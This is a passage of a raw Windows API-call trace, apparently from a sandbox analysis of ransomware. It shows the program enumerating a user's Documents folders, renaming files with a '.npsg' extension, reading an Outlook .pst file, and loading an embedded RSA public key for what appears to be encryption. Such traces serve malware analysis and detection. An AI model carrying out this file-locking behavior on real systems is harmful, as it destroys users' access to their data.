ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0237.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0237.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0237.616] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0237.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0237.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.620] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=0) returned 1 [0237.620] CloseHandle (hObject=0x644) returned 1 [0237.621] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.npsg")) returned 1 [0237.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0237.621] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0237.621] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0237.621] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.622] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.622] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.622] PathFindFileNameW (pszPath="") returned="" [0237.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0237.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.622] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.622] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.622] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.622] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.623] PathFindFileNameW (pszPath="") returned="" [0237.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.623] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0237.623] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0237.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.624] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=271360) returned 1 [0237.624] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.626] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.626] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.627] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.627] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0237.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.630] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.630] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.631] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.631] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.631] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.631] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.631] GetLastError () returned 0x0 [0237.631] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.631] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.631] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.631] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.631] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x3b95d50 [0237.632] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409368 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400680 [0237.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34093b0 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.633] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34006c8 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.634] GetCurrentThreadId () returned 0x5b4 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82708 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.634] GetCurrentThreadId () returned 0x5b4 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400728 [0237.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.635] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400740 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400758 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006f8 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006c8 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.637] RtlAllocateHeap (HeapHandle=0x620000, 